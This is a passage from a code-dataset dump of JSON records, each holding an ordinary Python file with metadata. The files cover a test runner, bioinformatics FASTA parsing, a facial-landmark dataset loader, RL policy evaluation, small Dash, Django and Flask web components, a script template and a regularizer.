"usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.pardir", "line_number": 9, "usage_type": "attribute"}, {"api_name": "setuptools.setup", "line_number": 11, "usage_type": "call"}, {"api_name": "dual_sessions.__version__", "line_number": 13, "usage_type": "name"}, {"api_name": "setuptools.find_packages", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "91480174", "text": "import os\nimport unittest\nfrom common import HTMLTestRunner\nimport getpathInfo\n\n\n# 定义测试用例的目录为当前目录,跑所有的用例\npath = getpathInfo.get_Path()\ntest_dir = os.path.join(path, 'testCase')\nreport_dir = os.path.join(path, 'result')\ndiscover = unittest.defaultTestLoader.discover(test_dir, pattern='test_*.py', top_level_dir=None)\n\n\ndef run():\n print(discover)\n # 定义报告存放路径\n filename = os.path.join(report_dir, \"report.html\")\n\n fp = open(filename, \"wb\")\n # 定义测试报告\n runner = HTMLTestRunner.HTMLTestRunner(stream=fp, title='Test Report', 
description='OSS-CORE interface test report')\n    # run the tests\n    runner.run(discover)\n    # close the report file\n    fp.close()\n\n\nif __name__ == \"__main__\":\n    run()\n", "sub_path": "runAll.py", "file_name": "runAll.py", "file_ext": "py", "file_size_in_byte": 774, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "getpathInfo.get_Path", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "unittest.defaultTestLoader.discover", "line_number": 11, "usage_type": "call"}, {"api_name": "unittest.defaultTestLoader", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "common.HTMLTestRunner.HTMLTestRunner", "line_number": 21, "usage_type": "call"}, {"api_name": "common.HTMLTestRunner", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "254297633", "text": "#!/usr/bin/env python3\n\"\"\"\nYH ~ 20.6.2018\n[chain_nr_identity.py] \nFor each protein in a file of fasta sequences, reports the number of chains per\nprotein, the number of identical chains, and the chain IDs of the identical chains\nInput: combined.fasta file\nOutput: chain_identity.dat file\n\nImprovements - does not work on files with empty sequence entries \n\"\"\"\n#################################### IMPORTS ###################################\nfrom sys import argv\nimport itertools\nimport json\n################################### FUNCTIONS ##################################\n\ndef fasta_parser(inputfile):\n    \"\"\"\n    Returns three lists, one of sequence IDs, one of sequences, one of sequence lengths,\n    in the order read in file\n    Input argument = inputfile (a FASTA file)\n    Returns seq_ids; list of sequence IDs, seq_list; list of sequences, seq_lengths; list of sequence lengths \n    \"\"\"\n    seq_ids = [] \n    seq_list = []\n    seq_lengths = []\n    seq = []\n\n    for line in inputfile:\n        if not line.strip():\n            continue\n        if line.startswith('>'):\n            seq_ids.append(line.strip().split('>')[1:])\n            if seq:\n                seqstr = \"\".join(seq)\n                seq_list.append(seqstr)\n                seq = []\n        else:\n            seq.append(line.strip())\n\n\n    seqstr = \"\".join(seq)\n    seq_list.append(seqstr)\n    \n    for sequence in seq_list:\n        seq_lengths.append(len(sequence))\n\n    seq_ids = list(itertools.chain.from_iterable(seq_ids))\n\n    return seq_ids, seq_list, seq_lengths\n\ndef print_output(protdict, unequalchains):\n    \"\"\"\n    Writes per-protein chain counts and the IDs of proteins with mismatched chains to text files.\n    \"\"\"\n    protdict = list(protdict.items())\n    unequalchains = list(set(unequalchains))\n\n    chainnrfile = open('numberofchains.txt', 'w+')\n    for i in range(len(protdict)):\n        chainnrfile.write('{}\\t{}'.format(protdict[i][0], protdict[i][1]))\n        if i != len(protdict) - 1:\n            chainnrfile.write('\\n')\n    chainnrfile.close()\n\n    problemsfile = open('unequalchains.txt', 'w+')\n    for i in range(len(unequalchains)):\n        problemsfile.write('{}'.format(unequalchains[i]))\n        if i != len(unequalchains) - 1:\n            problemsfile.write('\\n')\n    problemsfile.close()\n\n#################################### MAIN ######################################\nif __name__ == \"__main__\":\n\n    # parse fasta file to get IDs, sequences, and their lengths \n    SeqIDs, Sequences, SeqLengths = fasta_parser(open(argv[1]))\n\n    # produces a dictionary of unique proteins and the number of chains in 
PDB\n    # also produces a list of proteins with chains that don't match\n    count = 1\n    ProtDict = {SeqIDs[0][0:4]:count}\n    Unequal_chains = []\n\n    for i in range(len(SeqIDs)-1):\n        uniq_id = SeqIDs[i][0:4]\n        new_id = SeqIDs[i+1][0:4]\n\n        if new_id == uniq_id:\n            count = count + 1\n            ProtDict[uniq_id] = count\n            if Sequences[i] != Sequences[i+1]:\n                Unequal_chains.append(new_id)\n        else:\n            count = 1\n            ProtDict[new_id] = count\n\n    # save output in an analysis file\n    print_output(ProtDict, Unequal_chains)\n", "sub_path": "chain_nr_identity.py", "file_name": "chain_nr_identity.py", "file_ext": "py", "file_size_in_byte": 3072, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "itertools.chain.from_iterable", "line_number": 49, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 77, "usage_type": "name"}]} +{"seq_id": "127835952", "text": "# ------------------------------------------------------------------------------\r\n# Copyright (c) Microsoft\r\n# Licensed under the MIT License.\r\n# Created by Tianheng Cheng(tianhengcheng@gmail.com), Yang Zhao\r\n# ------------------------------------------------------------------------------\r\n\r\nimport os\r\nimport random\r\n\r\nimport torch\r\nimport torch.utils.data as data\r\nimport pandas as pd\r\nfrom PIL import Image, ImageFile\r\nimport numpy as np\r\n\r\nfrom ..utils.transforms import fliplr_joints, crop, generate_target, transform_pixel\r\n\r\nImageFile.LOAD_TRUNCATED_IMAGES = True\r\n\r\n\r\nclass AFLW(data.Dataset):\r\n    \"\"\"AFLW\r\n    \"\"\"\r\n    def __init__(self, cfg, is_train=True, transform=None):\r\n        # specify annotation file for dataset\r\n        if is_train:\r\n            self.csv_file = cfg.DATASET.TRAINSET\r\n        else:\r\n            self.csv_file = cfg.DATASET.TESTSET\r\n\r\n        self.is_train = is_train\r\n        self.transform = transform\r\n        self.data_root = cfg.DATASET.ROOT\r\n        self.input_size = cfg.MODEL.IMAGE_SIZE\r\n        self.output_size = cfg.MODEL.HEATMAP_SIZE\r\n        self.sigma = cfg.MODEL.SIGMA\r\n        self.scale_factor = cfg.DATASET.SCALE_FACTOR\r\n\r\n        #rot_factor is the rotation angle range used for augmentation\r\n        self.rot_factor = cfg.DATASET.ROT_FACTOR\r\n        self.label_type = cfg.MODEL.TARGET_TYPE\r\n        self.flip = cfg.DATASET.FLIP\r\n        self.mean = np.array([0.485, 0.456, 0.406], dtype=np.float32)\r\n        self.std = np.array([0.229, 0.224, 0.225], dtype=np.float32)\r\n        # load annotations\r\n        self.landmarks_frame = pd.read_csv(self.csv_file)\r\n\r\n    def __len__(self):\r\n        return len(self.landmarks_frame)\r\n\r\n    def __getitem__(self, idx):\r\n        #idx is the image index\r\n\r\n        image_path = os.path.join(self.data_root,\r\n                                  self.landmarks_frame.iloc[idx, 0])\r\n        scale = self.landmarks_frame.iloc[idx, 1]\r\n        box_size = self.landmarks_frame.iloc[idx, 2]\r\n\r\n        center_w = self.landmarks_frame.iloc[idx, 3]\r\n        center_h = self.landmarks_frame.iloc[idx, 4]\r\n        center = torch.Tensor([center_w, center_h])\r\n\r\n        pts = self.landmarks_frame.iloc[idx, 5:].values\r\n        ##pts holds the coordinates of all landmarks, shape (19,2)\r\n        pts = pts.astype('float').reshape(-1, 2)\r\n\r\n\r\n        scale *= 1.25\r\n        nparts = pts.shape[0] #number of landmarks\r\n        img = np.array(Image.open(image_path).convert('RGB'), dtype=np.float32)\r\n\r\n\r\n        r = 0\r\n        if self.is_train:\r\n            #random scale jitter for augmentation\r\n            scale = scale * (random.uniform(1 - self.scale_factor,\r\n                                            1 + self.scale_factor))\r\n\r\n            ##random rotation and flipping for image augmentation\r\n            r = random.uniform(-self.rot_factor, self.rot_factor) \\\r\n                if random.random() <= 0.6 else 0\r\n            if random.random() <= 0.5 and self.flip:\r\n                img = np.fliplr(img)\r\n                pts = fliplr_joints(pts, width=img.shape[1], dataset='AFLW')\r\n                center[0] = img.shape[1] - center[0]\r\n\r\n        #transform the image according to the augmentations above\r\n        img = crop(img, 
center, scale, self.input_size, rot=r)\r\n\r\n        target = np.zeros((nparts, self.output_size[0], self.output_size[1]))\r\n        ##target is the generated heatmap, shape: 19 x 64 x 64\r\n\r\n        tpts = pts.copy()\r\n        ##make a copy of the landmark coordinates\r\n\r\n\r\n        for i in range(nparts):\r\n            #iterate over the landmark points one by one\r\n            if tpts[i, 1] > 0:\r\n                #only for points with y coordinate > 0\r\n                tpts[i, 0:2] = transform_pixel(tpts[i, 0:2]+1, center,\r\n                                               scale, self.output_size, rot=r)\r\n\r\n                target[i] = generate_target(target[i], tpts[i]-1, self.sigma,\r\n                                            label_type=self.label_type)\r\n\r\n\r\n        ##normalization and conversion to tensors\r\n        img = img.astype(np.float32)\r\n        img = (img/255.0 - self.mean) / self.std\r\n        img = img.transpose([2, 0, 1])\r\n        target = torch.Tensor(target)\r\n\r\n        tpts = torch.Tensor(tpts) #all coordinate values after the transform\r\n        center = torch.Tensor(center) #current center\r\n\r\n        meta = {'index': idx, 'center': center, 'scale': scale,\r\n                'pts': torch.Tensor(pts), 'tpts': tpts, 'box_size': box_size}\r\n\r\n        return img, target, meta\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n    pass\r\n", "sub_path": "lib/datasets/aflw.py", "file_name": "aflw.py", "file_ext": "py", "file_size_in_byte": 4261, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PIL.ImageFile.LOAD_TRUNCATED_IMAGES", "line_number": 18, "usage_type": "attribute"}, {"api_name": "PIL.ImageFile", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 70, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 70, "usage_type": "attribute"}, {"api_name": "random.uniform", "line_number": 76, "usage_type": "call"}, {"api_name": "random.random", "line_number": 81, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 80, "usage_type": "call"}, {"api_name": "random.random", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.fliplr", "line_number": 83, "usage_type": "call"}, {"api_name": "utils.transforms.fliplr_joints", "line_number": 84, "usage_type": "call"}, {"api_name": "utils.transforms.crop", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 90, "usage_type": "call"}, {"api_name": "utils.transforms.transform_pixel", "line_number": 101, "usage_type": "call"}, {"api_name": "utils.transforms.generate_target", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 109, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 118, "usage_type": "call"}]} +{"seq_id": "127212026", "text": "import os\r\nimport csv\r\nimport torch\r\nimport numpy as 
np\nimport time\nimport pdb\nfrom rlkit.torch.policies.make_deterministic import MakeDeterministic\nfrom rlkit.torch.core import eval_np, np_ify\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--exp_name', type=str, default='t_intersection_lstm4')\nparser.add_argument('--noise', type=float, default=0.05)\nparser.add_argument('--yld', type=float, default=0.5)\nparser.add_argument('--ds', type=float, default=0.1)\nparser.add_argument('--dfd', type=float, default=0.1)\nparser.add_argument('--dfi', type=float, default=0.3)\nparser.add_argument('--epoch', type=int, default=100)\nparser.add_argument('--pre_log', type=str, default='noise0.05yld0.5ds0.1')\nparser.add_argument('--file', type=str, default='params')\nargs = parser.parse_args()\n\npolicies = [\n 'PPOlayer1hidden48ep5000',\n 'PPOSupVanillalayer1hidden48ep5000',\n 'PPOSuplayer1hidden48ep5000',\n 'PPOSupSep2layer1hidden28ep5000',\n 'PPOGNN2llayer1hidden24GSagenode24glayer3actreluep5000',\n 'PPOSupVanillaGNN2llayer1hidden24GSagenode24glayer3actreluep5000',\n 'PPOSupGNN2llayer1hidden24GSagenode24glayer3actreluep5000',\n 'PPOSupSep2GNN2llayer1hidden18GSagenode18glayer3actreluep5000',\n 'PPOSupSep2LSTMGNN2layer1hidden28GSagenode18glayer3suphidden18suplayer1actreluep5000',\n ]\nseeds = [0,1,2]\nextra_name = ''\n\npre_dir = './Data/'+args.exp_name+args.pre_log\nlog_dir = extra_name+'noise'+str(args.noise)+'yld'+str(args.yld)+'ds'+str(args.ds)+'dfd'+str(args.dfd)+'dfi'+str(args.dfi)+'epoch'+str(args.epoch)\nlog_dir = '{}/Eval/{}'.format(pre_dir,log_dir)\nif not os.path.isdir(log_dir):\n os.makedirs(log_dir)\n\nwith open('{}/result.csv'.format(log_dir), mode='w') as csv_file:\n writer = csv.writer(csv_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n writer.writerow(['Policy', 'Num Path', 'Return', 'Success Rate', 'Collision Rate', 'Inference Accuracy'])\n\n from traffic.make_env import make_env\n env_kwargs=dict(\n num_updates=1,\n obs_noise=args.noise,\n yld=args.yld,\n driver_sigma=args.ds,\n des_front_gap_difference=args.dfd,\n des_front_gap_interval=args.dfi,\n )\n env = make_env(args.exp_name,**env_kwargs)\n max_path_length = 200\n for policy_path in policies:\n for seed in seeds:\n data_path = '{}/{}/seed{}_load/{}.pkl'.format(pre_dir,policy_path,seed,args.file)\n if os.path.exists(data_path):\n print('_load')\n else:\n data_path = '{}/{}/seed{}/{}.pkl'.format(pre_dir,args.log_dir,args.seed,args.file)\n data = torch.load(data_path,map_location='cpu')\n\n policy = data['trainer/policy']\n eval_policy = MakeDeterministic(policy)\n\n returns = []\n success_num = 0\n collision_num = 0\n inference_correct = 0\n inference_total = 0\n for _ in range(args.epoch):\n o = env.reset()\n policy.reset()\n path_length = 0\n done = False\n c_r = 0.\n while True:\n path_length += 1\n a, agent_info = eval_policy.get_action(o)\n o, r, done, env_info = env.step(a)\n\n if 'intentions' in agent_info.keys():\n intention_probs = agent_info['intentions']\n inffered_intentions = np.argmax(intention_probs,axis=-1)\n true_intentions = env.get_sup_labels()\n valid_mask = ~np.isnan(true_intentions)\n true_intentions = true_intentions[valid_mask]\n inffered_intentions = inffered_intentions[valid_mask]\n inference_correct += np.sum(inffered_intentions==true_intentions)\n inference_total += np.sum(valid_mask)\n else:\n inference_total += 1\n\n c_r += r\n if path_length > max_path_length or done:\n returns.append(c_r)\n if env_info['event'] == 'goal':\n success_num += 1\n elif env_info['event'] == 'collision':\n collision_num 
+= 1\n break\n\n policy_name = '{}_seed{}_{}'.format(policy_path,seed,args.file)\n writer.writerow([policy_name, args.epoch, np.mean(returns),success_num/args.epoch,collision_num/args.epoch,inference_correct/inference_total])\n", "sub_path": "tests/Traffic/t_intersection_lstm/eval_policy.py", "file_name": "eval_policy.py", "file_ext": "py", "file_size_in_byte": 4666, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 41, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 44, "usage_type": "call"}, {"api_name": "csv.QUOTE_MINIMAL", "line_number": 44, "usage_type": "attribute"}, {"api_name": "traffic.make_env.make_env", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 65, "usage_type": "call"}, {"api_name": "rlkit.torch.policies.make_deterministic.MakeDeterministic", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 108, "usage_type": "call"}]} +{"seq_id": "103611834", "text": "\"\"\"Initializes the Penn Medicine masthead\n#! consider moving this into navbar or static\n\"\"\"\nfrom typing import List\n\nfrom dash.development.base_component import ComponentMeta\nfrom dash_html_components import Div, A\n\nfrom chime_dash.app.components.base import Component\n\n\nclass Header(Component):\n \"\"\"\n \"\"\"\n\n localization_file = \"header.yml\"\n\n def get_html(self) -> List[ComponentMeta]:\n \"\"\"Initializes the header dash html\n \"\"\"\n content = self.content\n return [\n Div(\n className=\"penn-medicine-header__content\",\n children=[\n\n A(\n className=\"penn-medicine-header__title\",\n id=\"title\",\n children=content[\"title\"],\n ),\n ],\n )\n ]\n", "sub_path": "src/chime_dash/app/components/header.py", "file_name": "header.py", "file_ext": "py", "file_size_in_byte": 847, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "chime_dash.app.components.base.Component", "line_number": 12, "usage_type": "name"}, {"api_name": "dash_html_components.Div", "line_number": 23, "usage_type": "call"}, {"api_name": "dash_html_components.A", "line_number": 27, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 18, "usage_type": "name"}, {"api_name": "dash.development.base_component.ComponentMeta", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "118807098", "text": "from django.contrib.auth.models import User\nfrom Gestion.models import *\nfrom django.contrib.auth.decorators import login_required\n\n@login_required(login_url='/logearse')\ndef pedidosTmpComprador(request):\n\tusuario = Usuario.objects.get(user=request.user)\n\t# usuario = Usuario.objects.get(pk=2)\n\n\ttry:\n\t\tpedidos = PedidoTmp.objects.filter(comprador=usuario.empresa)\n\t\t# pedidos = PedidoTmp.objects.all()\n\n\t\treturn 
{'pedidos':pedidos,'nombre_empresa':usuario.empresa.nombre_empresa, 'id_empresa':usuario.empresa.id}\n\texcept Usuario.DoesNotExist:\n\t\tprint('dsd')\n\treturn {'pedidos':'vacio','nombre_empresa':usuario.empresa.nombre_empresa, 'id_empresa':usuario.empresa.id}", "sub_path": "Cibercomerciante/Compradores/processor.py", "file_name": "processor.py", "file_ext": "py", "file_size_in_byte": 667, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.contrib.auth.decorators.login_required", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "9552432", "text": "from logging import debug\nfrom flask import Flask, render_template, request\nimport numpy as np\nimport joblib\n\napp = Flask(__name__)\n\n# load a model\nmodel = joblib.load('hiring_model.pkl')\n\n@app.route('/')\ndef welcome():\n return render_template('base.html')\n\n@app.route('/predict', methods = ['POST'])\ndef predict():\n\n exp = request.form.get('experience')\n score = request.form.get('test_score')\n interview_score = request.form.get('interview_score')\n\n prediction = model.predict([[int(exp), int(score), int(interview_score)]])\n\n output = round(prediction[0], 2)\n\n return render_template('base.html', prediction_text = f\"Employee salary will be $ {output}\")\n\n\nif __name__== '__main__':\n app.run(debug=True)", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 729, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "442464368", "text": "#!/usr/bin/env python\n\"\"\"A template for creating python scripts. After parsing of the command line\narguments through the function parse_args, the whole application control goes\nto the class App's run method.\n\nThe template has a logger _log being ready. Another _plain_logger for text\nwithout formatting. The reason of using a plain logger instead of \"print\" is\nfor skipping bufferng, which can be an issue if you redirect stdout to a file.\nNotice that _log uses stderr while _plain_logger uses stdout by default.\n_plain_error_logger is similar to _plain_logger but uses stderr.\n\nCommand line options of the script should be added to the parser of the\nfunction parse_args.\n\nThis script depends on the library sorno-py-scripts. 
You can find out the\ninstallation detail in https://github.com/hermantai/sorno-py-scripts.\n\n\n Copyright 2017 Heung Ming Tai\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport argparse\nimport logging\nimport subprocess\nimport sys\n\nfrom sorno import loggingutil\n\n\n_log = logging.getLogger()\n_plain_logger = None # will be created in main()\n_plain_error_logger = None # will be created in main()\n\n\nclass App(object):\n \"\"\"A console application to do work\"\"\"\n def __init__(self, args):\n \"\"\"\n Args:\n args (argparse.Namespace): The flags for the script.\n \"\"\"\n self.args = args\n\n def run(self):\n \"\"\"The entry point of the script\n \"\"\"\n _log.info(\"hello world\")\n _log.debug(\"hello world\")\n _plain_logger.info(\"plain hello world\")\n return 0\n\n def _run_cmd(self, cmd):\n \"\"\"Run a shell command\n\n Args:\n cmd (string or a list of strings): The shell command to run. If\n it's a string, uses the system shell to run the command. If\n it's a list of strings, the first string is the program to run\n and the rest are its arguments. The arguments are quoted\n properly by the subprocess module, so the arguments do not\n have to be quoted when passing to this method.\n \"\"\"\n _log.info(cmd)\n if isinstance(cmd, list):\n use_shell = False\n else:\n use_shell = True\n return subprocess.check_call(cmd, shell=use_shell)\n\n\ndef parse_args(cmd_args):\n description = __doc__.split(\"Copyright 2017\")[0].strip()\n\n parser = argparse.ArgumentParser(\n description=description,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n parser.add_argument(\n \"--debug\",\n action=\"store_true\",\n )\n\n args = parser.parse_args(cmd_args)\n return args\n\n\ndef main():\n global _plain_logger, _plain_error_logger\n\n args = parse_args(sys.argv[1:])\n\n loggingutil.setup_logger(_log, debug=args.debug)\n _plain_logger = loggingutil.create_plain_logger(\n \"PLAIN\",\n debug=args.debug,\n )\n _plain_error_logger = loggingutil.create_plain_logger(\n \"PLAIN_ERROR\",\n debug=args.debug,\n stdout=False,\n )\n\n app = App(args)\n sys.exit(app.run())\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "python/script_template.py", "file_name": "script_template.py", "file_ext": "py", "file_size_in_byte": 3779, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 46, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 84, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 90, "usage_type": "call"}, {"api_name": "argparse.RawDescriptionHelpFormatter", "line_number": 92, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 106, "usage_type": "attribute"}, {"api_name": "sorno.loggingutil.setup_logger", "line_number": 108, "usage_type": "call"}, 
{"api_name": "sorno.loggingutil", "line_number": 108, "usage_type": "name"}, {"api_name": "sorno.loggingutil.create_plain_logger", "line_number": 109, "usage_type": "call"}, {"api_name": "sorno.loggingutil", "line_number": 109, "usage_type": "name"}, {"api_name": "sorno.loggingutil.create_plain_logger", "line_number": 113, "usage_type": "call"}, {"api_name": "sorno.loggingutil", "line_number": 113, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 120, "usage_type": "call"}]} +{"seq_id": "572227402", "text": "from elegy import utils\nimport jax\nfrom elegy.losses.loss import Loss, Reduction\nimport jax.numpy as jnp\nimport haiku as hk\nimport typing as tp\n\n\nclass GlobalL1L2(Loss):\n r\"\"\"\n A regularizer that applies both L1 and L2 regularization penalties.\n\n The L1 regularization penalty is computed as:\n \n $$\n \\ell_1\\,\\,penalty =\\ell_1\\sum_{i=0}^n|x_i|\n $$\n \n The L2 regularization penalty is computed as\n \n $$\\ell_2\\,\\,penalty =\\ell_2\\sum_{i=0}^nx_i^2$$\n\n\n Usage:\n\n ```python\n model = elegy.Model(\n module_fn,\n loss=[\n elegy.losses.SparseCategoricalCrossentropy(),\n elegy.regularizers.GlobalL1L2(l1=1e-5, l2=1e-4),\n ],\n metrics=lambda: elegy.metrics.SparseCategoricalAccuracy(),\n )\n ```\n \n Attributes:\n l1: L1 regularization factor.\n l2: L2 regularization factor.\n \"\"\"\n\n def __init__(\n self,\n l1=0.0,\n l2=0.0,\n reduction: tp.Optional[Reduction] = None,\n name: tp.Optional[str] = None,\n weight: tp.Optional[float] = None,\n ): # pylint: disable=redefined-outer-name\n super().__init__(reduction=reduction, name=name, weight=weight)\n\n self.l1 = l1\n self.l2 = l2\n\n def __apply__(self, params: hk.Params) -> jnp.ndarray:\n \"\"\"\n Computes the L1 and L2 regularization penalty simultaneously.\n\n Arguments:\n params: A structure with all the parameters of the model.\n \"\"\"\n\n regularization: jnp.ndarray = jnp.array(0.0)\n\n if not self.l1 and not self.l2:\n return regularization\n\n if self.l1:\n regularization += self.l1 * sum(\n jnp.sum(jnp.abs(p)) for p in jax.tree_leaves(params)\n )\n\n if self.l2:\n regularization += self.l2 * sum(\n jnp.sum(jnp.square(p)) for p in jax.tree_leaves(params)\n )\n\n return regularization\n", "sub_path": "elegy/regularizers/global_l1l2.py", "file_name": "global_l1l2.py", "file_ext": "py", "file_size_in_byte": 1945, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "elegy.losses.loss.Loss", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 46, "usage_type": "attribute"}, {"api_name": "elegy.losses.loss.Reduction", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 47, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 48, "usage_type": "attribute"}, {"api_name": "haiku.Params", "line_number": 55, "usage_type": "attribute"}, {"api_name": "jax.numpy.ndarray", "line_number": 63, "usage_type": "attribute"}, {"api_name": "jax.numpy", "line_number": 63, "usage_type": "name"}, {"api_name": "jax.numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "jax.numpy.sum", "line_number": 70, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 70, "usage_type": "name"}, {"api_name": "jax.numpy.abs", "line_number": 70, "usage_type": "call"}, {"api_name": "jax.tree_leaves", "line_number": 70, "usage_type": "call"}, {"api_name": "jax.numpy.sum", "line_number": 75, "usage_type": "call"}, {"api_name": "jax.numpy", 
"line_number": 75, "usage_type": "name"}, {"api_name": "jax.numpy.square", "line_number": 75, "usage_type": "call"}, {"api_name": "jax.tree_leaves", "line_number": 75, "usage_type": "call"}, {"api_name": "jax.numpy.ndarray", "line_number": 55, "usage_type": "attribute"}, {"api_name": "jax.numpy", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "385215022", "text": "'''\r\nCreated on 28.03.2016\r\n\r\n@author: tobias\r\n'''\r\n\r\nimport time\r\nimport pprint\r\nimport easygui\r\nimport linecache\r\nimport re\r\nfrom random import randint\r\n\r\nprop = \"properties.txt\"\r\n'''\r\nProperties file format:\r\nline 1: popup interval in minutes\r\nline 2: disable for hours\r\nline 3: comma-seperated indices of files being loaded, next line has index 0\r\ntill end: each line a filename (vocabulary txt)\r\n'''\r\n\r\ndef read_data():\r\n data = []\r\n lnStr = linecache.getline(prop, 3)\r\n lnStr.replace(\"\\n\", \"\")\r\n for ln in lnStr.split(\", \"):\r\n lnNum = int(ln) + 3\r\n fn = linecache.getline(prop, lnNum)\r\n fn = fn.replace(\"\\n\", \"\")\r\n f = open(fn)\r\n data = data + f.readlines()\r\n return data\r\n\r\ndef 